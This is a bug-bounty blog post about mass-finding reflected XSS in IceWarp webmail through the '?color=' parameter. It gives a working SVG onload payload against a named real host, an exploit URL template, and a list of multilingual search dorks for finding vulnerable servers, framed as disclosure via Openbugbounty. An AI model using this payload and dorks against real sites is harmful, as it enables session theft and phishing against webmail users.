How I find 1K + XSS in just one day !

Sagar Yadav

Hi folks,

This blog about my latest finding, that how I found 1000+ XSS in just one day using google dorks.

So let’s talk about xss :-

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

By exploiting this Vulnerability an attacker can force the customer to execute XSS and

1.Steal user’s cookie.
2. Launch advanced phishing attacks by rendering arbitrary HTML forms.
3. Force users to download malware/viruses.
4. Execute browser-based attacks etc.

Now lets come to the point, that how it was started

It’s 1st week of this month and my friend Gaurav sent his xss finding POC on whatsapp😄 , I checked the POC and I find something familiar🤨 and I started checking my mails, I found that I submitted 2 XSS report to “icewarp” 3 months ago { it’s another thing that still I didn’t get any response 😑 }.
I checked mine and his POC both xss are in the same endpoint “?color=”.

http://web18.icewarp.hk/webmail/?color=“><svg/onload=alert(‘openbugbounty’)>

or

{Gaurav}

http://example.com/webmail/?color=“><svg/onload=alert(‘openbugbounty’)>

{

Exploit :-

http://example.com/webmail/?color=(XSS Payload Here)

http://example.com/webmail/old/?color=(XSS Payload Here)

}

Then I created a simple dork like everyone dose{intext:Powered by IceWarp} and I found 200 something XSS and I reported some xss in Openbugbounty but all went duplicate.

Then I submitted to CVE, but someone already assigned CVE a few weeks ago 😐

And I was like :-

I didn’t give up , I read server documentation -> found some keywords -> make some unique dorks 🙂 BOOM I got 1000+ vulnerable site 🙂

Search in :-Google, Yahoo, Bing
{

intext:美拉克 伺服系統 整合通訊 / Unified Communications
intext:Basado en tecnología IceWarp Comunicaciones Unificadas
intext:Basato su IceWarp Server
intext:Tecnologia fornecida por IceWarp Server
intext:Powered by IceWarp Czech RepublicIceWarp Mail server
intext:Basato su Comunicazioni Integrate IceWarp

}

I reported 100+ sites through openbugbounty but still thousands of sites are vulnerable, you can report those sites through openbugbounty .

Have a good day 🙂 Keep Hunting.